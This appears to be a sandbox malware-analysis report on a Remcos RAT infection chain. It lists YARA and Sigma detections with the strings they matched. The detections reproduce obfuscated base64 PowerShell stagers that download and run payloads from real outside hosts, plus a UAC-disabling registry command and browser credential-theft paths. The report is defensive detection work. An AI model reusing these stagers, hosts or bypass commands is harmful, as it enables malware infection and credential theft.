8.2.powershell.exe.90965d0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
8.2.powershell.exe.90965d0.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.powershell.exe.90965d0.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.powershell.exe.90965d0.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.powershell.exe.90965d0.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69ef8:$a1: Remcos restarted by watchdog! 0x6a470:$a3: %02i:%02i:%02i:%03i
8.2.powershell.exe.90965d0.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64194:$str_a1: C:\Windows\System32\cmd.exe 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64204:$str_b2: Executing file: 0x6503c:$str_b3: GetDirectListeningPort 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x64b80:$str_b7: \update.vbs 0x6422c:$str_b9: Downloaded file: 0x64218:$str_b10: Downloading file: 0x642bc:$str_b12: Failed to upload file: 0x65004:$str_b13: StartForward 0x65024:$str_b14: StopForward 0x64ad8:$str_b15: fso.DeleteFile " 0x64a6c:$str_b16: On Error Resume Next 0x64b08:$str_b17: fso.DeleteFolder " 0x642ac:$str_b18: Uploaded file: 0x6426c:$str_b19: Unable to delete: 0x64aa0:$str_b20: while fso.FileExists(" 0x64749:$str_c0: [Firefox StoredLogins not found]
8.2.powershell.exe.90965d0.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64080:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64010:$s1: CoGetObject 0x64024:$s1: CoGetObject 0x64040:$s1: CoGetObject 0x6dc70:$s1: CoGetObject 0x63fd0:$s2: Elevation:Administrator!new:
Click to see the 19 entries

Other

Source	Rule	Description	Author	Strings
amsi32_6556.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_6556.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0Z

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , ProcessId: 6500, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , ProcessId: 6500, ProcessName: wscript.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", ProcessId: 6080, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1488, TargetFilename: C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , ProcessId: 6500, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1488, TargetFilename: C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

